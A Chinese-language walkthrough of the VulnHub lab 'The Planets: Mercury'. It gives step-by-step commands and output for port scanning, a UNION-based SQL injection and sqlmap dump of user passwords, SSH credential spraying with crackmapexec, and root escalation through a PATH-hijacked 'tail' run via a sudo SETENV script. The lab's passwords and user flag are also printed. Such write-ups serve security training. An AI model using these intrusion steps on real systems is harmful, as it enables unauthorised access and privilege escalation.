[vulnhub] The Planets: Mercury

First Post:

Last Update:

Word Count:
4.8k

Read Time:
27 min

601c601ca7df92eef3eee22b83bcd142355143

信息收集

主机发现,端口扫描,服务检测,TCP扫描,OS检测,漏洞扫描。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo nmap -sn 192.168.56.0/24                                     
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-23 21:21 CST
Nmap scan report for 192.168.56.1
Host is up (0.00028s latency).
MAC Address: 0A:00:27:00:00:08 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00011s latency).
MAC Address: 08:00:27:17:F0:4B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.103
Host is up (0.00016s latency).
MAC Address: 08:00:27:80:E5:A9 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.144
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 6.95 seconds
                                                                                             
┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.103
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-23 21:22 CST
Nmap scan report for 192.168.56.103
Host is up (0.00052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy
MAC Address: 08:00:27:80:E5:A9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.87 seconds
                                                                                             
┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo nmap -sT -sV -sC -O -p22,8080 192.168.56.103
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-23 21:23 CST
Nmap scan report for 192.168.56.103
Host is up (0.00041s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c824ea2a2bf13cfa169465bdc79b6c29 (RSA)
|   256 e808a18e7d5abc5c66164824570dfab8 (ECDSA)
|_  256 2f187e1054f7b917a2111d8fb330a52a (ED25519)
8080/tcp open  http-proxy WSGIServer/0.2 CPython/3.8.2
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-robots.txt: 1 disallowed entry 
|_/
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Date: Tue, 23 May 2023 13:23:21 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html
|     X-Frame-Options: DENY
|     Content-Length: 2366
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta http-equiv="content-type" content="text/html; charset=utf-8">
|     <title>Page not found at /nice ports,/Trinity.txt.bak</title>
|     <meta name="robots" content="NONE,NOARCHIVE">
|     <style type="text/css">
|     html * { padding:0; margin:0; }
|     body * { padding:10px 20px; }
|     body * * { padding:0; }
|     body { font:small sans-serif; background:#eee; color:#000; }
|     body>div { border-bottom:1px solid #ddd; }
|     font-weight:normal; margin-bottom:.4em; }
|     span { font-size:60%; color:#666; font-weight:normal; }
|     table { border:none; border-collapse: collapse; width:100%; }
|     vertical-align:
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Tue, 23 May 2023 13:23:21 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html; charset=utf-8
|     X-Frame-Options: DENY
|     Content-Length: 69
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     Hello. This site is currently in development please check back later.
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.93%I=7%D=5/23%Time=646CBE4A%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Tue,\x2023\x20May\x202
SF:023\x2013:23:21\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.8\.2
SF:\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options:\x2
SF:0DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nosniff\r\
SF:nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\x20is\x
SF:20currently\x20in\x20development\x20please\x20check\x20back\x20later\."
SF:)%r(HTTPOptions,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Tue,\x2023\x20M
SF:ay\x202023\x2013:23:21\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/
SF:3\.8\.2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Opti
SF:ons:\x20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nos
SF:niff\r\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\
SF:x20is\x20currently\x20in\x20development\x20please\x20check\x20back\x20l
SF:ater\.")%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DT
SF:D\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\"http://www\
SF:.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x20\
SF:x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20cont
SF:ent=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<titl
SF:e>Error\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<
SF:body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x20\
SF:x20\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20version\x20\('RTSP/
SF:1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20expl
SF:anation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20request\x20syntax\x2
SF:0or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n</html>\n"
SF:)%r(FourOhFourRequest,A28,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x2
SF:0Tue,\x2023\x20May\x202023\x2013:23:21\x20GMT\r\nServer:\x20WSGIServer/
SF:0\.2\x20CPython/3\.8\.2\r\nContent-Type:\x20text/html\r\nX-Frame-Option
SF:s:\x20DENY\r\nContent-Length:\x202366\r\nX-Content-Type-Options:\x20nos
SF:niff\r\nReferrer-Policy:\x20same-origin\r\n\r\n<!DOCTYPE\x20html>\n<htm
SF:l\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20http-equiv=\"content-type\"
SF:\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20<title>Page\x20no
SF:t\x20found\x20at\x20/nice\x20ports,/Trinity\.txt\.bak</title>\n\x20\x20
SF:<meta\x20name=\"robots\"\x20content=\"NONE,NOARCHIVE\">\n\x20\x20<style
SF:\x20type=\"text/css\">\n\x20\x20\x20\x20html\x20\*\x20{\x20padding:0;\x
SF:20margin:0;\x20}\n\x20\x20\x20\x20body\x20\*\x20{\x20padding:10px\x2020
SF:px;\x20}\n\x20\x20\x20\x20body\x20\*\x20\*\x20{\x20padding:0;\x20}\n\x2
SF:0\x20\x20\x20body\x20{\x20font:small\x20sans-serif;\x20background:#eee;
SF:\x20color:#000;\x20}\n\x20\x20\x20\x20body>div\x20{\x20border-bottom:1p
SF:x\x20solid\x20#ddd;\x20}\n\x20\x20\x20\x20h1\x20{\x20font-weight:normal
SF:;\x20margin-bottom:\.4em;\x20}\n\x20\x20\x20\x20h1\x20span\x20{\x20font
SF:-size:60%;\x20color:#666;\x20font-weight:normal;\x20}\n\x20\x20\x20\x20
SF:table\x20{\x20border:none;\x20border-collapse:\x20collapse;\x20width:10
SF:0%;\x20}\n\x20\x20\x20\x20td,\x20th\x20{\x20vertical-align:");
MAC Address: 08:00:27:80:E5:A9 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.3
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.85 seconds
                                                                                             
┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo nmap --script=vuln 192.168.56.103           
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-23 21:29 CST
Stats: 0:07:29 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.48% done; ETC: 21:36 (0:00:07 remaining)
Nmap scan report for 192.168.56.103
Host is up (0.00026s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-enum: 
|_  /robots.txt: Robots file
MAC Address: 08:00:27:80:E5:A9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 522.27 seconds
                                                                                             
┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo nikto -h http://192.168.56.103:8080
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.103
+ Target Hostname:    192.168.56.103
+ Target Port:        8080
+ Start Time:         2023-05-23 21:38:54 (GMT8)
---------------------------------------------------------------------------
+ Server: WSGIServer/0.2 CPython/3.8.2
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /SilverStream: SilverStream allows directory listing. See: https://web.archive.org/web/20011226154728/http://archives.neohapsis.com/archives/sf/pentest/2000-11/0147.html
+ /static/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ 8103 requests: 0 error(s) and 2 item(s) reported on remote host
+ End Time:           2023-05-23 21:46:40 (GMT8) (466 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

只开了22和8080方法,漏扫也没什么有用结果。

简单做个网页目录发现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo dirb http://192.168.56.103:8080                                              
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed May 24 15:41:43 2023
URL_BASE: http://192.168.56.103:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.103:8080/ ----
+ http://192.168.56.103:8080/robots.txt (CODE:200|SIZE:26)                                            
-----------------
END_TIME: Wed May 24 15:42:18 2023
DOWNLOADED: 4612 - FOUND: 1

只发现robots.txt,并且里面没啥有用信息。
再在后台挂个feroxbuster +x php,txt,asp,zip确保目录发现没有遗漏什么重要信息。
但是不能闲着啊,于是我们尝试手动发现一下,惊喜的发现404页面的错误信息给我们带来了有用信息。
404pg.png
Django错误提示告诉我们有一个目录是mercuryfacts/
那我们就看看吧
mercury.png
底下两个连接可以看看。
先看看todo
todo-remain-us-something.png
发现两个有用信息:认证用的表很可能是’users’;现有的mysql请求是直接用python写的不是用django写的,很有可能存在SQL注入漏洞。
问题是哪里有SQLi漏洞,先不急看看另一个页面。
normalpapge.png
这个URL的1很像查询的参数,多半有问题,加个引号试试
SQLi-found.png
OK,不仅有SQL注入漏洞还有很详细的错误信息。那就别客气开始吧。

Exploit

Manual SQLi

先说一下手动方法。

  1. 先用order by猜列数

orderby-1.png
真就1列?
orderby-2.png
OK,真就1列。

  1. 列数确定了就可以UNION SELECT了。

先用UNION SELECT database()查库名。
UNION_SELECT_db.png
再用UNION SELECT group_concat(table_name) from information_schema.tables where table_schema=database()查表名。注意,此处如果直接from information_schema.tables查只会得到默认库中的表名,获得不到mercury库的表信息,需要我们自己指定数据库where table_schema=database()才行。
UNION_SELECT_tables.png
接下来UNION SELECT group_concat(column_name) from information_schema.columns where table_name='users'查列名。小技巧,如果单引号被过滤可以用16进制表名绕过。
UNION-col.png
东西都齐了直接查我们要的信息吧。UNION SELECT group concat(id,Ox7c,username,Ox7c,password)from usersOx7c是’|’的hex值,主要是我们加进来为了分割一下结果。
union-getuser.png
可以发现结果已经出来了。

SQLMAP

用sqlmap也可以,很快。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo sqlmap -u http://192.168.56.103:8080/mercuryfacts/ 

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo sqlmap -u http://192.168.56.103:8080/mercuryfacts/ --dbs

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo sqlmap -u http://192.168.56.103:8080/mercuryfacts/ -D mercury --tables

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo sqlmap -u http://192.168.56.103:8080/mercuryfacts/ -D mercury -T users --columns

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo sqlmap -u http://192.168.56.103:8080/mercuryfacts/ -D mercury -T users --dump

我们将获得的结果存进一个文件里并简单处理下存进两个txt文件中供之后尝试ssh登录备用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ cat rawdata 
+----+-------------------------------+-----------+
| id | password                      | username  |
+----+-------------------------------+-----------+
| 1  | johnny1987                    | john      |
| 2  | lovemykids111                 | laura     |
| 3  | lovemybeer111                 | sam       |
| 4  | mercuryisthesizeof0.056Earths | webmaster |
+----+-------------------------------+-----------+

┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ cat rawdata | awk -F '|' '{print $3}' 

 password                      

 johnny1987                    
 lovemykids111                 
 lovemybeer111                 
 mercuryisthesizeof0.056Earths 
 
┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ cat rawdata | awk -F '|' '{print $3}' > pass.txt
                                                                                                                             
┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ cat rawdata | awk -F '|' '{print $4}' > username.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ sudo crackmapexec ssh 192.168.56.103 -u username.txt -p pass.txt --continue-on-success
[sudo] password for kali: 
SSH         192.168.56.103  22     192.168.56.103   [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1
SSH         192.168.56.103  22     192.168.56.103   [-] john:johnny1987 Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] john:lovemykids111 Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] john:lovemybeer111 Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] john:mercuryisthesizeof0.056Earths Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] john: Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] john: Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] laura:johnny1987 Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] laura:lovemykids111 Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] laura:lovemybeer111 Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] laura:mercuryisthesizeof0.056Earths Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] laura: Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] laura: Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] sam:johnny1987 Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] sam:lovemykids111 Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] sam:lovemybeer111 Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] sam:mercuryisthesizeof0.056Earths Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] sam: Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] sam: Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] webmaster:johnny1987 Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] webmaster:lovemykids111 Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] webmaster:lovemybeer111 Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [+] webmaster:mercuryisthesizeof0.056Earths 
SSH         192.168.56.103  22     192.168.56.103   [-] webmaster: Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] webmaster: Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] :johnny1987 Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] :lovemykids111 Authentication failed.
SSH         192.168.56.103  22     192.168.56.103   [-] :lovemybeer111 Authentication failed.
^C

[*] Shutting down, please wait...

发现有可以成功登录的凭证,懒得等他跑完了,直接登录吧。

Priv Esca

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
┌──(kali㉿kali)-[~/vulnhub/mercury/workSpace]
└─$ ssh webmaster@192.168.56.103                                                          
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ED25519 key fingerprint is SHA256:mHhkDLhyH54cYFlptygnwr7NYpEtepsNhVAT8qzqcUk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.103' (ED25519) to the list of known hosts.
webmaster@192.168.56.103's password: 
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 23 May 17:02:38 UTC 2023

  System load:  0.0               Processes:               106
  Usage of /:   74.9% of 4.86GB   Users logged in:         0
  Memory usage: 30%               IPv4 address for enp0s3: 192.168.56.103
  Swap usage:   0%


22 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Sep  1 13:57:14 2020 from 192.168.31.136
webmaster@mercury:~$ whoami
webmaster
webmaster@mercury:~$ pwd
/home/webmaster
webmaster@mercury:~/mercury_proj$ sudo -l
[sudo] password for webmaster: 
Sorry, user webmaster may not run sudo on mercury.
webmaster@mercury:~$ ls -la
total 36
drwx------ 4 webmaster webmaster 4096 Sep  2  2020 .
drwxr-xr-x 5 root      root      4096 Aug 28  2020 ..
lrwxrwxrwx 1 webmaster webmaster    9 Sep  1  2020 .bash_history -> /dev/null
-rw-r--r-- 1 webmaster webmaster  220 Aug 27  2020 .bash_logout
-rw-r--r-- 1 webmaster webmaster 3771 Aug 27  2020 .bashrc
drwx------ 2 webmaster webmaster 4096 Aug 27  2020 .cache
drwxrwxr-x 5 webmaster webmaster 4096 Aug 28  2020 mercury_proj
-rw-r--r-- 1 webmaster webmaster  807 Aug 27  2020 .profile
-rw-rw-r-- 1 webmaster webmaster   75 Sep  1  2020 .selected_editor
-rw------- 1 webmaster webmaster   45 Sep  1  2020 user_flag.txt
webmaster@mercury:~$ cat user_flag.txt 
[user_flag_8339915c9a454657bd60ee58776f4ccd]

拿到了user_flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
webmaster@mercury:~$ cat .bash_history 
webmaster@mercury:~$ cd mercury_proj/
webmaster@mercury:~/mercury_proj$ ls -la
total 28
drwxrwxr-x 5 webmaster webmaster 4096 Aug 28  2020 .
drwx------ 4 webmaster webmaster 4096 Sep  2  2020 ..
-rw-r--r-- 1 webmaster webmaster    0 Aug 27  2020 db.sqlite3
-rwxr-xr-x 1 webmaster webmaster  668 Aug 27  2020 manage.py
drwxrwxr-x 6 webmaster webmaster 4096 Sep  1  2020 mercury_facts
drwxrwxr-x 4 webmaster webmaster 4096 Aug 28  2020 mercury_index
drwxrwxr-x 3 webmaster webmaster 4096 Aug 28  2020 mercury_proj
-rw------- 1 webmaster webmaster  196 Aug 28  2020 notes.txt
webmaster@mercury:~/mercury_proj$ cat notes.txt 
Project accounts (both restricted):
webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==
webmaster@mercury:~/mercury_proj$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mercury:x:1000:1000:mercury:/home/mercury:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:112:117:MySQL Server,,,:/nonexistent:/bin/false
webmaster:x:1001:1001:,,,:/home/webmaster:/bin/bash
linuxmaster:x:1002:1002:,,,:/home/linuxmaster:/bin/bash

先看看bash history,没内容。那么我们看看网页目录下有啥,有个notes.txt。查看一下,里面好像存了一个linuxmaster的登录凭证的base64编码。我们cat /etc/passwd确定确实有该用户,那我们echo 'bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==' | base64 -d解码一下尝试登录看看能不能成。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
webmaster@mercury:~/mercury_proj$ su linuxmaster
Password: 
linuxmaster@mercury:/home/webmaster/mercury_proj$ sudo -l
[sudo] password for linuxmaster: 
Matching Defaults entries for linuxmaster on mercury:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User linuxmaster may run the following commands on mercury:
    (root : root) SETENV: /usr/bin/check_syslog.sh
linuxmaster@mercury:/home/webmaster/mercury_proj$ cat /usr/bin/check_syslog.sh
#!/bin/bash
tail -n 10 /var/log/syslog
linuxmaster@mercury:/home/webmaster/mercury_proj$ ls -la /usr/bin/check_syslog.sh
-rwxr-xr-x 1 root root 39 Aug 28  2020 /usr/bin/check_syslog.sh

发现成功登录,查看sudo -l发现此用户可以以root身份无密码运行/usr/bin/check_syslog.sh且有SETENV权限。我们查看check_syslog.sh的内容,发现就是用tail查看下系统日志。
值得注意的是,这里的tail是用相对路径而不是绝对路径写的,所以系统执行时从PATH中寻找的。正好此用户有SETENV的权限,那我们的提权思路就很明确了:我们伪造一个tail,并把其位置写在PATH前面,因为系统执行是从前往后寻找的,这样我们就能以root权限执行我们先要执行的命令了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
linuxmaster@mercury:/tmp$ echo '/bin/bash -p' > tail
linuxmaster@mercury:/tmp$ chmod +xs tail 
linuxmaster@mercury:/tmp$ ls -la
total 48
drwxrwxrwt 10 root        root        4096 May 23 17:10 .
drwxr-xr-x 19 root        root        4096 Sep  1  2020 ..
-rwxr-xr-x  1 linuxmaster linuxmaster   39 May 23 17:05 backup
drwxrwxrwt  2 root        root        4096 May 23 13:14 .font-unix
drwxrwxrwt  2 root        root        4096 May 23 13:14 .ICE-unix
drwx------  3 root        root        4096 May 23 13:14 systemd-private-1295227d0ee948c7b42b8e747d46283d-systemd-logind.service-Pum4tf                                                                                                                    
drwx------  3 root        root        4096 May 23 13:14 systemd-private-1295227d0ee948c7b42b8e747d46283d-systemd-resolved.service-OBDWgg                                                                                                                  
drwx------  3 root        root        4096 May 23 13:14 systemd-private-1295227d0ee948c7b42b8e747d46283d-systemd-timesyncd.service-mA1HTi                                                                                                                 
-rwsrwsr-x  1 linuxmaster linuxmaster   13 May 23 17:10 tail
drwxrwxrwt  2 root        root        4096 May 23 13:14 .Test-unix
drwxrwxrwt  2 root        root        4096 May 23 13:14 .X11-unix
drwxrwxrwt  2 root        root        4096 May 23 13:14 .XIM-unix
linuxmaster@mercury:/tmp$ export PATH=/tmp:$PATH
linuxmaster@mercury:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
linuxmaster@mercury:/tmp$ sudo PATH=$PATH /usr/bin/check_syslog.sh 
root@mercury:/tmp# whoami
root
root@mercury:/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:80:e5:a9 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.103/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 584sec preferred_lft 584sec
    inet6 fe80::a00:27ff:fe80:e5a9/64 scope link 
       valid_lft forever preferred_lft forever
root@mercury:/tmp# uname -a
Linux mercury 5.4.0-45-generic #49-Ubuntu SMP Wed Aug 26 13:38:52 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
